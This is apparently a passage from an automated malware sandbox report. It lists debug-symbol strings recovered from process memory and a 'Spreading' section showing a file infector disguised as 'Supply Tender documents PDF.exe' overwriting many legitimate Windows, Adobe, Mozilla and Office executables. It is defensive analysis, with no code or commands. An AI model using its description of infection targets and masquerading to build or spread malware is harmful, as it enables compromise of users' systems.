Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000001.00000003.1822943236.00000000009C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1834169268.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821702415.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000001.00000003.1494485618.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdb source: armsvc.exe, 00000001.00000003.1342114265.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000001.00000003.1626565543.0000000001C00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000001.00000003.1626565543.0000000001C00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000001.00000003.1231003813.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000001.00000003.1642730823.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000001.00000003.1176733295.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000001.00000003.1869274891.0000000000950000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1874001903.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000001.00000003.1238642875.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MFPMP.pdbUGP source: svchost.exe, 00000005.00000003.1335036784.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1335134675.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1333051827.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, NSSASn0WvLKV.exe, 00000014.00000003.1306502158.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: mouslingly.exe, 00000003.00000003.1174898712.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, mouslingly.exe, 00000003.00000003.1175119323.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000005.00000002.1375534360.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1375534360.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1254013371.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1256763033.0000000003100000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000003.1310619898.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000003.1312678889.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2443234960.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000003.1375438357.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2443234960.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000003.1367538170.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.1402216539.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.1402216539.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.1389887586.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.1393035497.0000000003100000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000001.00000003.1591314165.00000000019B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000001.00000003.1269224153.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: armsvc.exe, 00000001.00000003.1269224153.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000001.00000003.1857034513.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000001.00000003.1776217424.0000000000910000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1783962032.0000000000630000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: mfpmp.exe, 00000018.00000002.2453813706.000000000347C000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2414107394.0000000002988000.00000004.00000020.00020000.00000000.sdmp, NSSASn0WvLKV.exe, 00000026.00000002.2445046656.000000000288C000.00000004.00000001.00040000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000001.00000003.1424612524.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: mfpmp.exe, 00000018.00000002.2453813706.000000000347C000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2414107394.0000000002988000.00000004.00000020.00020000.00000000.sdmp, NSSASn0WvLKV.exe, 00000026.00000002.2445046656.000000000288C000.00000004.00000001.00040000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000001.00000003.1670053737.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000001.00000003.1504523287.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: armsvc.exe, 00000001.00000003.1265153504.0000000001A30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1260014174.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: armsvc.exe, 00000001.00000003.1160283828.0000000001A70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000001.00000003.1642730823.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000001.00000003.1516990846.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000001.00000003.1504523287.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000001.00000003.1822943236.00000000009C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1834169268.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821702415.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000001.00000003.1591314165.00000000019B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000001.00000003.1692671371.00000000019A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000001.00000003.1494485618.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: armsvc.exe, 00000001.00000003.1869274891.0000000000950000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1874001903.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1752430570.00000000019C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000001.00000003.1298716234.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000001.00000003.1222505095.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: armsvc.exe, 00000001.00000003.1214543207.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000001.00000003.1238642875.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000001.00000003.1857034513.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000001.00000003.1256309080.0000000001A30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1243094689.0000000001B10000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1243749130.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NSSASn0WvLKV.exe, 00000014.00000000.1283174299.000000000074F000.00000002.00000001.01000000.00000008.sdmp, NSSASn0WvLKV.exe, 00000026.00000000.1452672566.000000000074F000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000001.00000003.1733215180.0000000001980000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: ADNotificationManager.exe.1.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000001.00000003.1670053737.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000001.00000003.1692671371.00000000019A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000001.00000003.1769006173.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: armsvc.exe, 00000001.00000003.1256309080.0000000001A30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1243094689.0000000001B10000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1243749130.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000001.00000003.1737492104.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MFPMP.pdb source: svchost.exe, 00000005.00000003.1335036784.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1335134675.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1333051827.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, NSSASn0WvLKV.exe, 00000014.00000003.1306502158.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
Source:	Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000001.00000003.1214543207.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000001.00000003.1776217424.0000000000910000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1783962032.0000000000630000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: mouslingly.exe, 00000003.00000003.1174898712.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, mouslingly.exe, 00000003.00000003.1175119323.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1375534360.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1375534360.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1254013371.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1256763033.0000000003100000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000003.1310619898.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000003.1312678889.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2443234960.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000003.1375438357.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2443234960.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000003.1367538170.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.1402216539.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.1402216539.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.1389887586.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.1393035497.0000000003100000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: armsvc.exe, 00000001.00000003.1349831301.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000001.00000003.1349831301.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: armsvc.exe, 00000001.00000003.1424612524.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000001.00000003.1699613216.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: Supply Tender documents PDF.exe, 00000000.00000003.1154076957.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: armsvc.exe, 00000001.00000003.1222505095.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: armsvc.exe, 00000001.00000003.1160283828.0000000001A70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: Supply Tender documents PDF.exe, 00000000.00000003.1154076957.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000001.00000003.1176733295.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: armsvc.exe, 00000001.00000003.1265153504.0000000001A30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1260014174.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000001.00000003.1516990846.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: ADNotificationManager.exe.1.dr
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
Source:	Binary string: ssh-agent.pdbX source: armsvc.exe, 00000001.00000003.1342114265.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: armsvc.exe, 00000001.00000003.1851868408.00000000009C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: armsvc.exe, 00000001.00000003.1298716234.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1737492104.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000001.00000003.1699613216.0000000001AF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000001.00000003.1851868408.00000000009C0000.00000004.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\vds.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\snmptrap.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
